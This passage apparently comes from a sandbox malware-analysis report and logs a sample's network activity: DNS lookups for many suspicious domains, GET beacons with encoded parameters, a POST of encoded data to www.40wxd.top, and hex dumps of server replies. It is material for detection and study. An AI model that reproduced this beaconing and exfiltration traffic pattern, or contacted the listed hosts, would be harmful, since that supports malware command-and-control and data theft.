Source: global traffic HTTP traffic detected: GET /jqkr/?nV=j99yFPFWu1ukFCAkcsa1pdNTyzikS1cIw9CibMKFTP9vYaGLd9Ca8ZMxvCgy8ZIQlD5WNv+rF4xM8fWyLzqu8NEu/AkJhGyL6Y/IOsxIi9hhzm6Wfo2GHcU4TuRzIqeNlQ==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.lurknlarkk.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Source: global traffic HTTP traffic detected: GET /hya5/?ntHx=DVDDWR70P4Ux&nV=kBImd3s/QyLjHyq4SLIoEPo9gYVaCCo4aEwkxNbGH3XUM96sRoRP4M1J0fvTDuXIyYiaCoNXLmg3Qmdc8wSzXF+iMRPEX9kIPKmzrc+t3cVFLxWq6eg+2bNJjDDlhrBGZQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.mommymode.siteConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Source: global traffic HTTP traffic detected: GET /nuqv/?nV=cqR4daz/40w4b6rdKNYqvkeleB2fEiPhnuSAX3LrEIyAZ4914Ww4a7UdeW+JTGwq/HZWal2FK/CEDxgqbNyvyy/SGYyigH7HtG4hHq89KwpktbUpTg5pzo/PCicdM9eRug==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.polarmuseum.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Source: global traffic DNS traffic detected: DNS query: www.newdaydawning.net
Source: global traffic DNS traffic detected: DNS query: www.40wxd.top
Source: global traffic DNS traffic detected: DNS query: www.uburn.xyz
Source: global traffic DNS traffic detected: DNS query: www.i16zb920d.cfd
Source: global traffic DNS traffic detected: DNS query: www.o731lh.vip
Source: global traffic DNS traffic detected: DNS query: www.nakama2-sshl.xyz
Source: global traffic DNS traffic detected: DNS query: www.zz82x.top
Source: global traffic DNS traffic detected: DNS query: www.tukaari.shop
Source: global traffic DNS traffic detected: DNS query: www.prj81oqde1.buzz
Source: global traffic DNS traffic detected: DNS query: www.komart.shop
Source: global traffic DNS traffic detected: DNS query: www.healthyloveforall.net
Source: global traffic DNS traffic detected: DNS query: www.lurknlarkk.xyz
Source: global traffic DNS traffic detected: DNS query: www.mommymode.site
Source: global traffic DNS traffic detected: DNS query: www.polarmuseum.info
Source: global traffic DNS traffic detected: DNS query: www
Source: unknown HTTP traffic detected: POST /l8if/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.40wxd.topOrigin: http://www.40wxd.topConnection: closeCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 203Referer: http://www.40wxd.top/l8if/User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)Data Raw: 6e 56 3d 53 5a 66 34 5a 58 5a 4c 52 75 44 38 6c 6b 56 43 71 6d 35 35 46 72 69 71 72 56 46 41 7a 6f 4c 6d 36 53 4f 4e 47 79 4d 77 54 52 53 30 69 44 4b 63 52 4b 56 6d 30 6c 49 4c 44 50 4d 46 6f 47 2f 33 64 71 4e 7a 52 4e 56 74 70 42 4b 45 6d 37 72 47 62 67 34 34 6e 32 52 53 6f 68 54 30 58 46 4f 77 71 44 6a 6f 54 65 72 65 4e 51 39 5a 63 41 6e 41 62 44 58 45 63 59 2f 46 52 6f 6d 68 72 63 4d 46 33 74 58 31 76 74 55 6d 52 4a 52 52 69 63 2f 69 69 59 32 42 34 62 4c 66 6f 71 38 54 78 5a 56 6d 33 39 59 71 37 77 6b 54 62 62 75 39 74 30 49 46 56 4c 43 36 7a 76 31 69 49 6c 6a 56 59 4e 4b 50 2b 54 46 56 39 67 34 3d Data Ascii: nV=SZf4ZXZLRuD8lkVCqm55FriqrVFAzoLm6SONGyMwTRS0iDKcRKVm0lILDPMFoG/3dqNzRNVtpBKEm7rGbg44n2RSohT0XFOwqDjoTereNQ9ZcAnAbDXEcY/FRomhrcMF3tX1vtUmRJRRic/iiY2B4bLfoq8TxZVm39Yq7wkTbbu9t0IFVLC6zv1iIljVYNKP+TFV9g4=
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:38:10 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:38:12 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:38:15 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:38:21 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:38:23 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:38:26 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:38:28 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:38:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 31 38 63 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 5c 7b 93 23 d5 75 ff 7b a7 8a ef d0 68 0c d2 10 b5 5a ad c7 bc 56 33 ce f2 72 a8 c2 40 60 89 8b 2c 5b 53 ad 56 4b ea d9 56 b7 dc dd 9a 07 cb 56 ed cc 60 17 60 1c b0 0d 26 04 c7 b1 89 0d 6b b0 89 09 54 8a 00 09 df 25 cd ec b2 7f e5 2b e4 77 ee bd dd ea 6e b5 46 1a 69 96 24 55 4c ed ce 48 f7 71 5e f7 9c 73 cf 3d 7d 6e 37 ee 7e f0 f1 07 2e 3e f3 c4 43 52 d7 ef 59 9b 0b 8d bb 65 f9 92 d9 96 2c 5f 7a e4 21 69 e5 32 5a a8 43 d2 2d cd f3 36 72 a6 b1 9c 93 2c cd ee 6c e4 b6 b5 dc a6 d4 b8 fb 92 61 b7 cc f6 65 59 1e ce cd 9c b8 32 d5 bc d5 51 84 93 e7 75 18 ad 98 4a c4 87 04 47 44 86 a4 e7 36 17 ce d1 80 04 c9 e7 1a 5d 43 6b 49 7d d7 68 9b 7b 1b 39 a7 b3 0e 39 f8 fd 75 45 71 3a fd 52 cf 50 6c 6f 51 6a 37 47 5b 95 76 73 51 d2 5c df d4 2d 23 a3 57 f4 2c 12 d2 73 8d 9e e1 6b 92 de d5 5c cf f0 37 72 4f 5f 7c 58 5e cd 49 c3 1e 5b eb 19 1b b9 1d d3 d8 ed 3b ae 9f 93 74 c7 f6 0d 1b 23 77 cd 96 df dd 68 19 3b a6 6e c8 ec 4b d1 b4 4d df d4 2c d9 d3 35 cb d8 50 4b e5 e2 c0 33 5c f6 55 6b a2 c5 76 8a 21 20 b9 6d fa 1b ba b3 63 b8 31 2a 38 ae b6 e3 f6 34 5f 6e 19 be a1 fb a6 63 c7 70 fa 86 65 f4 bb 8e 4d a0 38 91 e0 00 3f 9c 09 3e dd 75 9a 8e ef c5 26 d9 8e 69 b7 8c bd 62 db b1 2c 67 97 a1 23 be 2d d3 be 22 b9 86 b5 91 d3 2c df 70 6d cd 37 72 92 bf df 07 b7 5a bf 6f 99 ba 46 c8 15 d7 f3 fe 62 af 67 a1 cb f4 c1 42 ee d6 fb 07 b7 de fa ec e6 f5 f7 6e bf fd cf 5f 1f 7c 22 3d f9 d4 53 d2 c3 86 d1 ca 49 5d ac d3 46 4e ac 90 ad 5d d1 7a 5a 45 f6 bc ae 55 da db 7f 4e 69 b3 31 0a 13 ec 10 75 df b4 3b 4d 4d bf 32 69 36 28 70 fb 7a a9 df ed 8b b5 49 58 c2 1a 14 13 1c 79 ba 6b f6 7d c9 73 f5 f1 64 ec f6 65 b1 82 8a df 35 7a 86 a7 68 ed 36 88 30 dc ba b2 ed 29 64 4e 75 af 6b ee 94 b6 bd dc 66 43 e1 20 19 f4 b8 31 a5 64 9e e7 32 cf 47 ca 91 ef 69 7b b2 d9 d3 3a 86 0c ed a5 35 5f b7 34 b7 63 e4 25 08 a0 c1 24 b9 59 2b d7 24 39 25 cd 86 c2 fb 16 86 ab 93 6f d9 1e 01 69 1b be de cd 73 21 e7 15 25 2d 5f 0e 39 12 ec 98 59 da b6 b6 57 ea 38 4e c7 32 